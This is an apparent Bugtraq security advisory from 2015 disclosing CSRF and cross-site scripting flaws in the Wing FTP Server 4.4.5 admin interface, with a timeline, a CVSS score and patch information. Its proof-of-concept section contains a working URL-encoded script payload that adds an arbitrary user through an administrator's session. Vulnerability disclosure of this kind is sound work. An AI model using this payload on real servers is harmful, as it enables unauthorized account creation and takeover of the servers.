List: bugtraq
Subject: CSRF & XSS Wing FTP Server Admin <= v4.4.5
From: apparitionsec () gmail ! com
Date: 2015-04-28 17:04:12
Message-ID: 201504281704.t3SH4CYR009391 () sf01web3 ! securityfocus ! com
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities
Release Date:
=============
2015-04-28
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt
Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9
Product:
===============================
Wing FTP Server is an FTP server with a web-based administration interface; it supports the FTP, FTPS, HTTPS and SSH protocols.
Advisory Information:
==============================
A CSRF and client-side cross site scripting vulnerability in the Wing FTP Server Admin web interface allows a remote attacker to add arbitrary users to the system through the session of an authenticated administrator.
Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page
Affected Product(s):
====================
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Request Method(s):
[+] POST & GET
Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin
Proof of Concept (POC):
=======================
The CSRF and client-side cross site scripting vulnerability can be exploited by remote attackers who hold no account on the application, with low user interaction (a single click by a logged-in administrator). The `domain` parameter of admin_loglist.html is reflected into the page without output encoding, so a crafted link executes attacker-supplied script in the administrator's browser. The script below calls the admin interface's own ajaxRequest() helper to POST an admin_adduser request in the administrator's authenticated session, which adds an arbitrary user to the server.
PoC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]
POC: Add arbitrary user:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR]
POC XSS:
http://localhost:5466/admin_event_list.html?type=[XSS VECTOR]
Solution - Fix & Patch:
=======================
Vendor released Wing FTP Server 4.4.6, which fixes this issue; upgrade to 4.4.6 or later.
Security Risk:
==============
The CSRF and client-side cross site scripting vulnerability in the `domain` parameter of admin_loglist.html is rated with a CVSS score of 8.9 (high).
Credits & Authors:
==================
John Page ( hyp3rlinx ) @apparitionsec
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is, without any warranty. The security researcher John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental or consequential loss of business profits or special damages.
Domains: hyp3rlinx.altervista.org